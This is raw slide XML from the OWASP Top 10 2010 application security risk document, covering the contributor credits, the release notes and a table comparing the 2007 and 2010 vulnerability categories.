                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> Security Inc.)</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Jim Manico (for</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> all the Top 10 podcasts)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" kern="120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2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Paul Petefish (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Solutionary</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> Inc.)</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2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Eric Sheridan (Aspect Security)</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2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Neil Smithline (OneStopAppSecurity.com)</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Andrew van </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>der</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> Stock</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Colin Watson (Watson Hall, Ltd.)</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2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP Denmark Chapter (Led by Ulf </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Munkedal</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" kern="120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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP Sweden Chapter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> (Led by John </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Wilander</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>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1" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 3" descr="S:\P4\aspect\business_development\Graphics\Logos\Aspect Logo Black Alpha 150x35.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="4736552"/>
            <a:ext cx="2057400" cy="489204"/>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143000"/>
          <a:ext cx="6858000" cy="4343400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D113A9D2-9D6B-4929-AA2D-F23B5EE8CBE7}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="391359">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>What changed from 2007 to 2010?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1"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39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solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>The threat landscape for Internet applications constantly changes. Key factors in this evolution are advances made by attackers, the release of new technology, as well as the deployment of increasingly complex systems. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>To keep pace, we </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>periodically </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>update the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP Top 10. In this 2010 release, we have made three significant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2"/>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kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>We clarified that the Top 10 is about the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" u="none" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Top 10 Risks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, not the Top 10 most common weaknesses. See the details on the “</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" i="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Application Security Risks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>” page below.</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000" kern="1200" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>We changed our ranking methodology to estimate risk, instead of relying solely on the frequency of the associated weakness. This has affected the ordering of the Top 10, as you can see in the table below.</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000" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>We replaced two items on the list with two new items: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kern="1200" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>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2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ADDED: A6 – Security </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Misconfiguration</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>. This issue was A10 in the Top 10 from 2004: Insecure Configuration Management, but was dropped in 2007 because it wasn’t considered to be a software issue. However, from an organizational risk and prevalence perspective, it clearly merits re-inclusion in the Top 10; so now it’s back.</a:t>
                      </a:r>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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ADDED: A10 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Unvalidated</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> Redirects and Forwards</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>. This issue is making its debut in the Top 10. The evidence shows that this relatively unknown issue is widespread and can cause significant damage.</a:t>
                      </a:r>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2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>REMOVED: A3 – Malicious File Execution. This is still a significant problem in many different environments. However, its prevalence in 2007 was inflated by large numbers of PHP applications having this problem. PHP now ships with a more secure configuration by default, lowering the prevalence of this problem.</a:t>
                      </a:r>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2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>REMOVED: A6 – Information Leakage and Improper Error Handling. This issue is extremely prevalent, but the impact of disclosing stack trace and error message information is typically minimal. With the addition of Security </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Misconfiguration</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> this year, proper configuration of error handling is a big part of securely configuring your application and servers.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3" name="Table 72"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5486395"/>
          <a:ext cx="6858000" cy="3676361"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{D113A9D2-9D6B-4929-AA2D-F23B5EE8CBE7}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000"/>
                <a:gridCol w="3429000"/>
              </a:tblGrid>
              <a:tr h="351833">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 – 2007 (Previous)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:latin typeface="+mj-lt"/>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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 – 2010 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>(New)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:latin typeface="+mj-lt"/>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A2 – Injection Flaws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A1 – Injection</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r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>A1 – Cross</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> Site Scripting (XSS)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>A2 – Cross-Site Scripting (XSS)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-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A7 – Broken Authentication and Session Management</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A3 – Broken Authentication and Session Management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A4 – Insecure Direct Object Reference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A4 – Insecure Direct Object References</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A5 – Cross Site Request Forgery (CSRF)</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A5 – Cross-Site Request Forgery (CSRF)</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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&lt;was T10 2004 A10 – Insecure Configuration Management&gt;</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A6 – Security </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Misconfiguration</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> (NEW)</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A8 – Insecure Cryptographic Storage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A7 – Insecure Cryptographic Storage</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Failure to Restrict URL Access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A8 – Failure to Restrict URL Access</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A9 – Insecure</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> Communications</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A9 – Insufficient Transport Layer Protection</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&lt;not in T10 2007&gt;</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Unvalidated</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> Redirects and Forwards (NEW)</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A3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> – Malicious File Execution</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&lt;dropped from</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> T10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 2010&gt;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A6 – Information Leakage and Improper Error Handling</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&lt;dropped</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> from T10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 2010&gt;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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Release Notes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RN</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1143000"/>
            <a:ext cx="6858000" cy="38861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What Are Application Security Risks?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Sometimes, these paths are trivial to find and exploit and sometimes they are extremely difficult. Similarly, the harm that is caused may range from nothing, all the way through putting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the overall risk.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 115"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362201" y="3238500"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 63"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="495300" y="2400300"/>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a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AutoShape 163"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="2386013"/>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17" name="Rectangle 89"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>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Threat</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Agents</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="AutoShape 142"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="2362200"/>
            <a:ext cx="762000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 125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30" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5105400"/>
            <a:ext cx="4495800" cy="403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What’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My</a:t>
            </a:r>
